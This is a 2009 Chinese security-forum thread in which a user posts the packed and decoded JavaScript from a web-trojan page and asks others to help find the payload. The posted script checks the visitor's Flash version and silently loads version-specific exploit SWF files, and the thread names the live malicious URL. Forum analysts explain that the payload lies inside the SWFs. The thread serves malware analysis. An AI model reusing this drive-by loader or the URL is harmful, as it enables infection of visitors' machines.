大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马

	瑞星ESM助力北京石龙医院筑牢安全防线		瑞星恶意代码管理系统助金华电力提升防御能力		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		助力国家网络安全瑞星获病毒应急处理中心感谢信
	实力拉满瑞星第四十四次通过VB100测评		瑞星发布2024年六大网络安全趋势		瑞星携手中国农业大学共筑网络安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

[求助] 大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马

痴心2009 初生襁褓狮帖子:23 注册: 2009-08-19 来自:	发表于： 2009-08-20 12:19 \| 只看楼主短消息资料字号：小中大 1楼大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马 http://j7c7c.cn/x38/y1.htm 大家帮我看看这个网战上的网马本人觉得好象没有那么简单但是有不知道错在那里源码是这个<script type="text/javascript" src="swfobject.js"></script> <div id="avstYT">111</div><div id="safeYT">222</div> <script language =javascript> eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]\|\|e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2.3("<s w=\\"v\\/r\\">");2.3("7 6=t.q.m();");2.3("5(6[\\\'l\\\'+\\\'n\\\']==9){");2.3(" 2.i([url=]\\\'k\\\').j=\\"\\";");2.3[/url](" 5(6[\\\'8\\\']==o){");2.3(" 7 4=c b([url=file://\\]\\".\\/p.e\\",\\"a\\",\\"0.1\\",\\"0.1\\",\\"9\\",\\"#f\\");");2.3[/url](" 4.d([url=file://\\]\\"g\\")");2.3[/url](" }h 5(6[\\\'8\\\']==u){");2.3(" 7 4=c b([url=file://\\]\\".\\/y.e\\",\\"a\\",\\"0.1\\",\\"0.1\\",\\"9\\",\\"#f\\");");2.3[/url](" 4.d([url=file://\\]\\"g\\")");2.3[/url](" }h 5(6[\\\'8\\\']==D){");2.3(" 7 4=c b([url=file://\\]\\".\\/F.e\\",\\"a\\",\\"0.1\\",\\"0.1\\",\\"9\\",\\"#f\\");");2.3[/url](" 4.d([url=file://\\]\\"g\\")");2.3[/url](" }h 5(6[\\\'8\\\']==E){");2.3(" 7 4=c b([url=file://\\]\\".\\/B.e\\",\\"a\\",\\"0.1\\",\\"0.1\\",\\"9\\",\\"#f\\");");2.3[/url](" 4.d([url=file://\\]\\"g\\")");2.3[/url](" }h 5(6[\\\'8\\\']==C){");2.3(" 7 4=c b([url=file://\\]\\".\\/x.e\\",\\"a\\",\\"0.1\\",\\"0.1\\",\\"9\\",\\"#f\\");");2.3[/url](" 4.d([url=file://\\]\\"g\\")");2.3[/url](" }h 5(6[\\\'8\\\']>=A){");2.3(" 5(2.i){");2.3(" 2.i([url=]\\\'k\\\').j=\\"\\"");2.3[/url](" }");2.3(" }");2.3("}");2.3("<[url=]\\/z>")',42,42,'\|\|document\|writeln\|so\|if\|version\|var\|rev\|\|mymovie\|SWFObject\|new\|write\|swf\|000000\|avstYT\|else\|getElementById\|innerHTML\|safeYT\|ma\|getPlayerVersion\|jor\|115\|x1\|SWFObjectUtil\|javascript\|script\|deconcept\|47\|text\|type\|x5\|x3\|ScripT\|124\|x2\|28\|45\|64\|x4'.split('\|'),0[/url],{})) 我用eval解密以后出现的代码是这个 document.writeln("<script type=\"text\/javascript\">");document.writeln("var version=deconcept.SWFObjectUtil.getPlayerVersion();");document.writeln("if(version[\'ma\'+\'jor\']==9){");document.writeln(" document.getElementById(\'safeYT\').innerHTML=\"\";");document.writeln(" if(version[\'rev\']==115){");document.writeln(" var so=new SWFObject(\".\/x1.swf\",\"mymovie\",\"0.1\",\"0.1\",\"9\",\"#000000\");");document.writeln(" so.write(\"avstYT\")");document.writeln(" }else if(version[\'rev\']==47){");document.writeln(" var so=new SWFObject(\".\/x3.swf\",\"mymovie\",\"0.1\",\"0.1\",\"9\",\"#000000\");");document.writeln(" so.write(\"avstYT\")");document.writeln(" }else if(version[\'rev\']==45){");document.writeln(" var so=new SWFObject(\".\/x4.swf\",\"mymovie\",\"0.1\",\"0.1\",\"9\",\"#000000\");");document.writeln(" so.write(\"avstYT\")");document.writeln(" }else if(version[\'rev\']==64){");document.writeln(" var so=new SWFObject(\".\/x2.swf\",\"mymovie\",\"0.1\",\"0.1\",\"9\",\"#000000\");");document.writeln(" so.write(\"avstYT\")");document.writeln(" }else if(version[\'rev\']==28){");document.writeln(" var so=new SWFObject(\".\/x5.swf\",\"mymovie\",\"0.1\",\"0.1\",\"9\",\"#000000\");");document.writeln(" so.write(\"avstYT\")");document.writeln(" }else if(version[\'rev\']>=124){");document.writeln(" if(document.getElementById){");document.writeln(" document.getElementById(\'safeYT\').innerHTML=\"\"");document.writeln(" }");document.writeln(" }");document.writeln("}");document.writeln("<\/ScripT>") 我没有找到网马地址不知道那位大狭能帮助一下用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) networkedition 最后编辑于 2009-08-20 12:44:59
痴心2009 初生襁褓狮帖子:23 注册: 2009-08-19 来自:	分享到：

backway 卡卡反病毒小组帖子:2473 注册: 2008-11-20 来自:	发表于： 2009-08-20 12:28 \| 短消息资料字号：小中大 2楼回复：大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马 http://j7c7c.cn/x38/x1.swf等swf里 ps：禁用url识别回帖时左边就有
backway 卡卡反病毒小组帖子:2473 注册: 2008-11-20 来自:

痴心2009 初生襁褓狮帖子:23 注册: 2009-08-19 来自:	发表于： 2009-08-20 14:10 \| 只看楼主短消息资料字号：小中大 3楼回复：大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马那这个SWF文件怎么打开呢
痴心2009 初生襁褓狮帖子:23 注册: 2009-08-19 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-08-20 14:29 \| 短消息资料字号：小中大 4楼回复: 大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马直接用freshow的check获取到源文件后，就可以看到网马地址了。见下图： x1.jpg (170.27 K) 2009-8-20 14:29:05
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

痴心2009 初生襁褓狮帖子:23 注册: 2009-08-19 来自:	发表于： 2009-08-20 14:40 \| 只看楼主短消息资料字号：小中大 5楼回复：大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马哈哈您可真厉害那有没有办法把它修改呢
痴心2009 初生襁褓狮帖子:23 注册: 2009-08-19 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-08-20 14:54 \| 短消息资料字号：小中大 6楼回复 5F 痴心2009 的帖子你要修改什么，要修改服务器端的文件，客户端是无法对服务器端文件进行修改的
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

痴心2009 初生襁褓狮帖子:23 注册: 2009-08-19 来自:	发表于： 2009-08-20 20:30 \| 只看楼主短消息资料字号：小中大 7楼回复：大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马我很大家对我的帮助但是我还是有一个问题我知道这是个FLASH网马所以我把他的文件都下载了下来其中包括一个htm文件和12个swf文件我在本地假设WEB服务器按理说只要我运行我的地址http://127.0.0.1:88/1.htm这个地址我就会中了它的木马但是很可惜我们有中而且一点反映也没有我很奇怪为什么我访问http://j7c7c.cn/x38/y1.htm会中木马而访问http://127.0.0.1:88/1.htm却一点事情也没有呢帖子里的高手能帮我解答一下吗
痴心2009 初生襁褓狮帖子:23 注册: 2009-08-19 来自:

是昔流芳卡卡反病毒小组帖子:646 注册: 2009-05-10 来自:青鸾峰	发表于： 2009-08-20 20:35 \| 短消息资料字号：小中大 8楼回复：大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马 88端口是做什么的？ My Blog
是昔流芳卡卡反病毒小组帖子:646 注册: 2009-05-10 来自:青鸾峰

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT